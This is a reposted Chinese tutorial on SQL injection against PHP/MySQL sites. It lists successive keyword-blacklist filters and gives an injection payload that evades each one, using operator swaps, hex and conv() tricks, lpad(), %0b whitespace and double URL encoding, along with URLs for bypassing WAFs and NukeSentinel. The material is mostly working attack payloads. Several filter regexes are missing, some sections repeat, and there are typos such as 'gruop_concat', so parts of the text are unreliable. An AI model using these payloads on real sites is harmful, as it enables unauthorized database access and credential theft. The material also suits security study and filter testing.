當(dāng)前位置：首頁(yè) > 运维知识 > 数据库 >内容正文

数据库

PHP_Mysql注入防护与绕过

發(fā)布時(shí)間：2024/9/19 数据库 31 豆豆

生活随笔收集整理的這篇文章主要介紹了 PHP_Mysql注入防护与绕过小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

黑名單關(guān)鍵字過(guò)濾與繞過(guò)

過(guò)濾關(guān)鍵字and、or

PHP匹配函數(shù)代碼如下：

preg_match('/(and|or)/i', $id)

如何Bypass，過(guò)濾注入測(cè)試語(yǔ)句：

1 or 1 = 1 ? ? ? ? ? ? ? ?1 and 1 = 1

測(cè)試方法可以替換為如下語(yǔ)句測(cè)試：

1 || 1 = 1 ? ? ? ? ? ? ? ?1 && 1 = 1

過(guò)濾關(guān)鍵字and, or, union

PHP匹配函數(shù)代碼如下：

preg_match('/(and|or|union)/i', $id)

如何Bypass，過(guò)濾注入測(cè)試語(yǔ)句：

union select user, password from users

測(cè)試方法可以替換為如下語(yǔ)句測(cè)試：

1 || (select user from users where user_id = 1) = 'admin'

過(guò)濾關(guān)鍵字and, or, union，where

PHP匹配函數(shù)代碼如下：

preg_match('/(and|or|union|where)/i', $id)

如何Bypass，過(guò)濾注入測(cè)試語(yǔ)句：

1 || (select user from users where user_id = 1) = 'admin'

測(cè)試方法可以替換為如下語(yǔ)句測(cè)試：

1 || (select user from users limit 1) = 'admin'

過(guò)濾關(guān)鍵字and, or, union，where，limit

PHP匹配函數(shù)代碼如下：

preg_match('/(and|or|union|where|limit)/i', $id)

如何Bypass，過(guò)濾注入測(cè)試語(yǔ)句：

1 || (select user from users limit 1) = 'admin'

測(cè)試方法可以替換為如下語(yǔ)句測(cè)試：

1 || (select user from users group by user_id having user_id = 1) = 'admin'

過(guò)濾關(guān)鍵字and, or, union，where，limit，group by

PHP匹配函數(shù)代碼如下：

如何Bypass，過(guò)濾注入測(cè)試語(yǔ)句：

1 || (select user from users group by user_id having user_id = 1) = 'admin'

測(cè)試方法可以替換為如下語(yǔ)句測(cè)試：

1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1

過(guò)濾關(guān)鍵字and, or, union，where，limit，group by

PHP匹配函數(shù)代碼如下：

如何Bypass，過(guò)濾注入測(cè)試語(yǔ)句：

1 || (select user from users group by user_id having user_id = 1) = 'admin'

測(cè)試方法可以替換為如下語(yǔ)句測(cè)試：

1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1

過(guò)濾關(guān)鍵字and, or, union，where，limit，group by，select

PHP匹配函數(shù)代碼如下：

如何Bypass，過(guò)濾注入測(cè)試語(yǔ)句：

1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1

測(cè)試方法可以替換為如下語(yǔ)句測(cè)試：

1 || 1 = 1 into outfile 'result.txt'

1 || substr(user,1,1) = 'a'

過(guò)濾關(guān)鍵字and, or, union，where，limit，group by，select，'

PHP匹配函數(shù)代碼如下：

如何Bypass，過(guò)濾注入測(cè)試語(yǔ)句：

1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1

測(cè)試方法可以替換為如下語(yǔ)句測(cè)試：

1 || user_id is not null

1 || substr(user,1,1) = 0x61

1 || substr(user,1,1) = unhex(61)

過(guò)濾關(guān)鍵字and, or, union，where，limit，group by，select，'，hex

PHP匹配函數(shù)代碼如下：

如何Bypass，過(guò)濾注入測(cè)試語(yǔ)句：

1 || substr(user,1,1) = unhex(61)

測(cè)試方法可以替換為如下語(yǔ)句測(cè)試：

1 || substr(user,1,1) = lower(conv(11,10,36))

過(guò)濾關(guān)鍵字and, or, union，where，limit，group by，select，'，hex，substr

PHP匹配函數(shù)代碼如下：

如何Bypass，過(guò)濾注入測(cè)試語(yǔ)句：

1 || substr(user,1,1) = lower(conv(11,10,36))

測(cè)試方法可以替換為如下語(yǔ)句測(cè)試：

1 || lpad(user,7,1)

過(guò)濾關(guān)鍵字and, or, union，where，limit，group by，select，'，hex, substr, white space

PHP匹配函數(shù)代碼如下：

如何Bypass，過(guò)濾注入測(cè)試語(yǔ)句：

1 || lpad(user,7,1)

測(cè)試方法可以替換為如下語(yǔ)句測(cè)試：

1%0b||%0blpad(user,7,1)

部分WAF繞過(guò)技巧

1、繞過(guò)部分WAF

/news.php?id=1+un/**/ion+se/\**/lect+1,2,3--

2、匹配正則如下：

/union\sselect/g

繞過(guò)方式：

/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--

3、過(guò)濾一次關(guān)鍵字

/news.php?id=1+UNunionION+SEselectLECT+1,2,3--

4、關(guān)鍵字被過(guò)濾，有的時(shí)候可以用%0b插入關(guān)鍵字繞過(guò)

/news.php?id=1+uni%0bon+se%0blect+1,2,3--

5、對(duì)于Mod_rewrite的作用使得/**/不起作用時(shí)可以使用%0b代替

替換前：

/main/news/id/1//||//lpad(first_name,7,1).html

替換后：

/main/news/id/1%0b||%0blpad(first_name,7,1).html

6、大多數(shù)的CMS和WAF會(huì)對(duì)用戶輸入進(jìn)行解碼然后過(guò)濾，但有些只解碼一次，我們可以對(duì)payload進(jìn)行多次編碼然后測(cè)試

/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--

真實(shí)的例子

NukeSentinel

Nukesentinel.php的代碼如下：

針對(duì)上面的防護(hù)，使用如下測(cè)試語(yǔ)句將被攔截：

/php-nuke/?/**/union/**/select…

可以使用如下語(yǔ)句代替：

/php-nuke/?/%2A%2A/union/%2A%2A/select…

/php-nuke/?%2f**%2funion%2f**%2fselect…

總結(jié)

以上是生活随笔為你收集整理的PHP_Mysql注入防护与绕过的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。